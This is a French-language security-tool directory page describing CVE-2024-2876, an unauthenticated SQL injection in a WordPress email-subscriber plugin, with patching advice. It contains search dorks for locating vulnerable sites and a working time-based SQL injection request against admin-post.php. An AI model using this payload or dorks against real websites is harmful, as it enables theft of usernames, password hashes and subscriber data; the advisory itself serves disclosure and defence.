Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-2876 | Kitploit
Outils/GitHubGitHub/kernel364/cve-2024-2876
ReconnaissanceAnalyse des VulnérabilitésExploitationExploitation d'Applications Web
GitHubkernel364/cve-2024-2876

CVE-2024-2876

Voir le dépôt
2il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-2876 - Vulnérabilité d'injection SQL dans Email Subscribers par Icegram Express

Aperçu

CVE-2024-2876 est une vulnérabilité de sécurité critique découverte dans le plugin « Email Subscribers by Icegram Express » pour WordPress. Cette vulnérabilité affecte les versions jusqu'à la 5.7.14 incluse et présente des risques importants pour plus de 90 000 sites Web.

Détails de la vulnérabilité

  • ID CVE : CVE-2024-2876
  • Score CVSS : 9.8 (Critique)
  • Versions affectées : Jusqu'à 5.7.14
  • Version corrigée : 5.7.15 et supérieures

Description

La vulnérabilité est une faille d'injection SQL qui permet à des attaquants non authentifiés d'exécuter des requêtes SQL malveillantes sur les bases de données WordPress affectées. En manipulant des entrées utilisateur qui ne sont pas correctement assainies, les attaquants peuvent extraire des informations sensibles telles que des noms d'utilisateur, des adresses e-mail, des hachages de mots de passe et des listes d'abonnés.

Mécanisme d'exploitation

L'injection SQL se produit dans la fonction run de la classe IG_ES_Subscribers_Query du plugin, où une validation insuffisante des entrées conduit à une exécution non autorisée de code SQL. Cela compromet l'intégrité et la confidentialité des données stockées dans la base de données WordPress.

Dorks CVE-2024-2876

  • FOFA : body="/wp-content/plugins/email-subscribers/"

  • publicwww : "/wp-content/plugins/email-subscribers/"

POC CVE-2024-2876

root@kitploit:~
POST /wp-admin/admin-post.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111

Recommandations

  1. Mise à jour immédiate : Si vous utilisez le plugin « Email Subscribers by Icegram Express », mettez à niveau vers la version 5.7.15 ou une version ultérieure immédiatement pour appliquer le correctif de sécurité.

  2. Audits réguliers : Examinez et mettez à jour régulièrement tous les plugins et thèmes WordPress vers leurs dernières versions pour garantir la sécurité.

  3. Plugins de sécurité : Utilisez des plugins de sécurité WordPress réputés pour renforcer les défenses contre l'injection SQL et d'autres menaces informatiques.

  4. Politiques de mots de passe forts : Mettez en place des mots de passe forts et uniques pour tous les comptes liés à votre site WordPress afin de réduire les risques d'accès non autorisé.

Impact de la non-conformité

Ne pas mettre à jour le plugin affecté peut laisser les sites Web vulnérables aux violations de données et aux accès non autorisés. Compte tenu de l'utilisation répandue de ce plugin, une action immédiate est cruciale pour sécuriser les installations.

Télécharger l’outil